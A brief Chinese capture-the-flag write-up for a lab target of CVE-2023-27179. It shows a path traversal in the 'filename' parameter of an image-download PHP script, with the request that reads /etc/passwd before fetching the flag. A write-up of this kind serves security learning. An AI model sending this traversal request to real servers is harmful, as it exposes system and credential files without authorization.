【春秋云镜】CVE-2023-27179靶标Wp

文章详细描述了一次针对服务器的攻击,利用`filename`参数的漏洞进行文件下载,通过控制该参数读取了`/etc/passwd`文件,展示了黑客如何利用技术漏洞进行渗透测试。操作部分展示了攻击步骤和发现的漏洞影响。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01:漏洞点

他的标题已经告诉我们路径在哪里,所以我们直接访问/_admin/imgdownload.php

OK啊白白的一片,直接丢Yakit里面去 教训他。

0x02:操作部分

报告长官,一切正常!!未发现连接错误!!!

现在我们知道题目说filename参数存在漏洞,我们直接控制参数!!!!!goggogo

直接来一套!!!

GET /_admin/imgdownload.php?filename=../../../../../etc/passwd HTTP/1.1
Host: URL

ok 可以发现可以通过filename参数进行读取,所以我们直接读取flag终结他吧!!!!!!!

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值